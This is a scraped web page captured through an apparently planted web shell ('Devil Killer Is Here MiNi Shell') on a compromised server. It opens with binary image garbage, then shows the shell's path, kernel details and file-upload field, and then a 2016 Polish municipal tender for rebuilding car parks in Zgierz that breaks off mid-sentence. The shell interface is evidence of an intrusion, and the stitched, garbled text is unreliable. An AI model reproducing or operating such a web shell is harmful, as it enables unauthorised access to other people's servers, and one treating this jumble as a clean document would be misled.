JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160727/161747-N-2016.html

<p class="kh_header"><b>Zgierz: Przebudowa parkingów i miejsc postojowych na terenie Gminy Miasto Zgierz</b><br>
<b>Numer ogłoszenia: 161747 - 2016; data zamieszczenia: 27.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Zgierz , Plac Jana Pawła II 16, 95-100 Zgierz, woj. łódzkie, tel. 0427162854 w. 200, 7143200, faks 042 7143203.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa parkingów i miejsc postojowych na terenie Gminy Miasto Zgierz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje budowę zatoki postojowej przy ul. Cezaka, urządzenie miejsc parkingowych przed budynkiem Cechu przy Alei Armii Krajowej 2, przebudowę parkingu i chodników przy ul. Łęczyckiej 24  na terenie Gminy Miasto Zgierz, zgodnie z przedstawionym poniżej zakresem rzeczowym zamówienia oraz załączonymi planami sytuacyjnymi (załącznik nr 1), specyfikacją techniczną wykonania i odbioru robót budowlanych (załącznik nr 2), aktualnie obowiązującymi przepisami. Przedmiar robót (załącznik nr 3) należy traktować jako materiał pomocniczy, nie będący podstawą opisu przedmiotu zamówienia i obliczenia ceny ryczałtowej oferty. Zamawiający jest w trakcie procedury zgłoszenia robót niewymagających uzyskania pozwolenia na budowę. W związku z powyższym, na wypadek wniesienia przez organ sprzeciwu, Zamawiający przewiduje możliwość ograniczenia zakresu rzeczowego zamówienia (dotyczy urządzenia miejsc parkingowych przed budynkiem Cechu przy Alei Armii Krajowej).
Zakres rzeczowy zamówienia w szczególności obejmuje:
1.	Budowę zatoki postojowej przy ul. Cezaka w tym:
a)	rozebranie krawężników betonowych 15x30 - ok. 36,00 m2
b)	wykonanie parkingu - ok. 159,00 m2
- warstwa ścieralna z kostki betonowej - grubość 8 cm
- stabilizacja podłoża cementem Rm 1,5 MPa - grubość 10 cm
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 - grubość 20 cm;
c)	wykonanie chodnika - ok. 92,0 m2
- warstwa ścieralna z kostki betonowej - grubość  6 cm
- stabilizacja podłoża cementem Rm 1,5 MPa - grubość 10 cm
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 - grubość 10 cm;
- usunięcie drzew - 3 szt. o średnicach od 45 cm do 48 cm zgodnie z decyzją o pozwoleniu na wycinkę (Zamawiający przekaże Wykonawcy decyzję o pozwoleniu na wycinkę drzew) oraz nasadzenia zastępcze - 1 szt - głóg pośredni, Pauls Scarlet.
2.	Urządzenie miejsc parkingowych przed budynkiem Cechu przy Alei Armii Krajowej w tym:
a)	rozebranie krawężników  betonowych - ok.48,0 m
b)	wykonanie parkingu - ok.513,00 m2
- warstwa ścieralna z kostki betonowej - grubość 8 cm
- stabilizacja podłoża cementem Rm 1,5 MPa - grubość 10 cm
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 - grubość 20 cm;
3.	Przebudowę parkingu i chodników przy ul. Łęczyckiej 24 w tym:
a)	rozebranie krawężników  betonowych - ok.225,0 m
c)	rozebranie nawierzchni z kostki nieregularnej - 1.154,00 m2
d)	wykonanie parkingu - ok.1157,50 m2
- warstwa ścieralna z kostki betonowej - grubość 8 cm 
- stabilizacja podłoża cementem Rm 1,5 MPa - grubość 10 cm 
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 - grubość 20 cm;
e)	rozebranie chodników - ok. 298,00 m2
f)	wykonanie chodników - ok. 298,00 m2
- warstwa ścieralna z kostki betonowej - grubość  6 cm
- stabilizacja podłoża cementem Rm 1,5 MPa - grubość 10 cm
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 - grubość 10 cm;
- usunięcie drzew - 8 szt. o średnicach od 45 cm do 95 cm zgodnie z decyzją o pozwoleniu na wycinkę (Zamawiający przekaże Wykonawcy decyzję o pozwoleniu na wycinkę drzew) oraz nasadzenia zastępcze - 8 szt klon zwyczajny odmiana Fassen Black o obwodzie 12-14 cm
- kosze typ K3 zgodnie z załączonym rysunkiem - 2 szt.
B/  Warunki realizacji zamówienia:
1.	Wykonawca ponosi wszystkie koszty związane z realizacją zamówienia. Są to między innymi: koszty badań, odbiorów, usunięcie ewentualnie występujących kolizji, regulacji pionowej studzienek telefonicznych oraz skrzynek i zasuw wodociągowych.
2.	Wykonawca wykona oznakowanie miejsc parkingowych i zatoki postojowej.
3.	Elementy starej nawierzchni pochodzące z rozbiórki, a nadające się do ponownego wbudowania, należy złożyć na paletach, zabezpieczyć i przetransportować w miejsce wskazane przez Zamawiającego na terenie miasta Zgierza. Koszty powyższych czynności wraz z kosztem palet ponosi Wykonawca.
4.	Zaleca się, aby Wykonawca przed złożeniem oferty dokonał wizji w terenie oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty.
5.	Wszystkie użyte materiały winny spełniać obowiązujące normy i posiadać niezbędne deklaracje zgodności, certyfikaty.
6.	Wykonawca winien opracować niezbędny projekt organizacji ruchu, związany z zamknięciem chodników na czas ich przebudowy, na koszt własny.
7.	Wykonawca winien uzyskać decyzje na czasowe zajęcie ul. Cezaka. Ulica Cezaka jest drogą gminną.
8.	Wykonawca zostanie przez Zamawiającego zwolniony z opłaty za uzgodnione czasowe zajęcie  jezdni.
9.	Budowę zatoki postojowej jak i przebudowy parkingów należy prowadzić w sposób jak najmniej uciążliwy dla mieszkańców, pacjentów przychodni i użytkowników dróg. 
10.	O zamknięciu odcinka chodnika dla ruchu pieszego na ul. Cezaka należy skutecznie powiadomić mieszkańców z 7-dniowym wyprzedzeniem.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Wykonanie robót związanych z przebudową parkingów i miejsc postojowych stanowiące 50 % wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.33.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: 8.000,00 PLN. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: Bank Spółdzielczy w Zgierzu 74 8783 0004 0017 2303 2000 0108. Wadium wnoszone w innej formie należy złożyć w kasie, pokój nr 014, Urząd Miasta Zgierza, plac Jana Pawła II 16, 95-100 Zgierz</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu wg kryterium: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie (zakończenie wykonania) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 roboty budowlanej o wartości minimum 300.000,00 zł odpowiadającej swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (związanej z przedmiotem zamówienia), tj. roboty drogowe, potwierdzone załączonymi dowodami dotyczącymi najważniejszych robót, określającymi, że roboty te zostały wykonane w sposób należyty oraz wskazującymi, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz złożonego wykazu robót budowlanych z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. UWAGA 1: Zamawiający uzna wartość robót stanowiącą sumę wartości wykonanych robót budowlanych, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia. UWAGA 2: Wartości wymagane, występujące w dokumentach potwierdzających spełnianie warunku udziału w postępowaniu wyrażone w walutach obcych będą przeliczane na polski złoty wg średniego kursu określonego przez NBP (Tabela A kursów średnich walut obcych) tego środka płatniczego w dniu zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w tym dniu NBP nie opublikuje informacji o średnim kursie walut - Zamawiający dokona odpowiednio przeliczeń wg średniego kursu z pierwszego kolejnego dnia, w którym ta publikacja nastąpi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu wg kryterium: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest dysponowanie osobami, które będą uczestniczyć w wykonywaniu zamówienia posiadającymi wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.: - co najmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej. Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia i oświadczenia, że osoby te posiadają wymagane uprawnienia, wg kryterium: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu wg kryterium: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>dotyczy robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (związanych z przedmiotem zamówienia), tj. roboty drogowe;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca składa ofertę równoważną - dokumenty (dowody) potwierdzające równoważność oferty lub rozwiązania. 1. W przypadkach opisu przedmiotu zamówienia (lub jego części) przez wskazanie znaków towarowych, patentów lub pochodzenia - Zamawiający dopuszcza możliwość składania ofert równoważnych w tym zakresie. 2. W przypadku opisu przedmiotu za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30. ust 1-3 ustawy - Prawo zamówień publicznych - Zamawiający dopuszcza rozwiązania równoważne opisanym w ten sposób 3. Za równoważne Zamawiający uzna oferty lub rozwiązania umożliwiające uzyskanie rezultatu założonego przez Zamawiającego; spełniające wymagania w stopniu nie gorszym, niż wynikający z opisu przedmiotu zamówienia, jak w pkt. 1 lub 2 w zakresie cech, parametrów i właściwości odnoszących się bezpośrednio do funkcji (mające na nie wpływ) jakie to zamówienie, po zrealizowaniu - winno pełnić. 4. Zamawiający wymaga wykazania przez Wykonawców, dowodami przedstawionymi w formie pisemnej - faktu, iż zaoferowana oferta lub rozwiązanie są istotnie równoważne</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji powyżej 5 lat - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, odpowiednio do treści art. 144 ust.1 ustawy - Prawo Zamówień publicznych, jak również możliwość wprowadzenia zmian nieistotnych, tj. takich, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia nie wpłynęłaby                                 na krąg podmiotów ubiegających się o to zamówienie, czy też na wynik postępowania.

2. Zmiany postanowień zawartej umowy, o których mowa w ust.1, mogą nastąpić wyłącznie za zgodą Stron, wyrażoną w formie pisemnego aneksu, pod rygorem nieważności.

3. Zmiany umowy będą możliwe wówczas, jeżeli:
         1) nie będą dotyczyły istotnych postanowień zawartej umowy w stosunku do treści oferty, 
              na podstawie której dokonano wyboru Wykonawcy albo

         2) będą dotyczyły istotnych postanowień zawartej umowy w stosunku do treści oferty, 
              na podstawie której dokonano wyboru Wykonawcy, przy czym:

          a) okażą się korzystne dla Zamawiającego, przy czym korzystność zmiany rozpatrywana będzie  przez Zamawiającego w ujęciu subiektywnym, w odniesieniu do konkretnego stanu faktycznego 
i całokształtu praw i obowiązków Zamawiającego wynikających z zawartej umowy albo

          b) konieczność takich zmian wyniknie z okoliczności, których przy zachowaniu należytej staranności nie można było przewidzieć w chwili zawierania umowy, w szczególności  
w przypadkach: istotnej zmiany na rynku walutowym, istotnej zmiany na rynku ekonomicznym, istotnej zmiany prawa - zmiany przepisów powszechnie obowiązujących, istotna, odbiegająca 
od normy, zmiana warunków atmosferycznych, itp. 

4. Dokonanie zmian jest w szczególności możliwe w przypadku wystąpienia co najmniej jednej 
      z okoliczności wymienionych poniżej, z uwzględnieniem podanych powyżej warunków ich wprowadzenia:

1)	w zakresie zmiany czasu na ukończenie robót:

    a) zmiany spowodowane warunkami atmosferycznymi, w szczególności:
 - klęski żywiołowe,
 - warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót 
   budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów,

      b) zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi
            lub terenowymi, w szczególności:
 - niewypały i niewybuchy,
 - wykopaliska archeologiczne,
 - odmienne od przyjętych w dokumentacji projektowej warunki geologiczne,
 - odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie
   niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych.

     c) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności -
                wstrzymanie robót przez Zamawiającego,

     d) zmiany będące następstwem działania organów administracji i innych podmiotów o kompetencjach
         zbliżonych do organów administracji, w szczególności administratorów infrastruktury,

     e) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące
          niemożnością prowadzenia prac lub wykonania innych czynności przewidzianych umową.
2) 	w zakresie zmiany sposobu wykonania umowy (konieczności wykonania tzw. robót zamiennych) - 
            zmiany technologiczne, materiałowe, spowodowane w szczególności następującymi okolicznościami:

a)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na 
zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji przedmiotu umowy,
b)	pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na
zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonania prac, jak również kosztów
eksploatacji przedmiotu umowy,
c)	konieczność lub możliwość zrealizowania projektu przy zastosowaniu innych - nowych, rozwiązań 
    technicznych / technologicznych, niż wskazane w dokumentacji projektowej w sytuacji, gdy okażą
    się korzystniejsze dla Zamawiające lub gdyby zastosowanie przewidzianych rozwiązań groziło 
    niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
d)	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne, skutkując niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych,
e)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie 
 niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych,
f)	    konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych
lub materiałowych ze względu na zmiany obowiązującego prawa,
g)	konieczność usunięcia sprzeczności w dokumentacji w przypadku niemożności usunięcia 
sprzeczności przy pomocy wykładni, w szczególności, gdy sprzeczne zapisy mają równy stopień
pierwszeństwa,
h)	konieczność uzupełnienia, zmian lub usunięcia wad dokumentacji projektowej.

       3)  w zakresie innych zmian -  spowodowanych następującymi okolicznościami:
      a)   siłą wyższą, uniemożliwiającą wykonanie przedmiotu umowy zgodnie z SIWZ,
                        b) zmianą obowiązującej stawki VAT, przy czym zmiana stawki VAT dotyczyć będzie ceny 
      w części, jakiej dotyczą te zmiany przepisów,
                 c)  zmianą wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 
                        ustawy z dnia10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. Nr 200, 
                       poz. 1679, z późn. zm.),
                 d) zmianą zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu 
                        lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
            e) zmianą sposobu rozliczania umowy lub dokonania płatności na rzecz Wykonawcy
                   na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu 
                   lub wytycznych dotyczących realizacji projektu, przy czym zmiany dostosują sposób
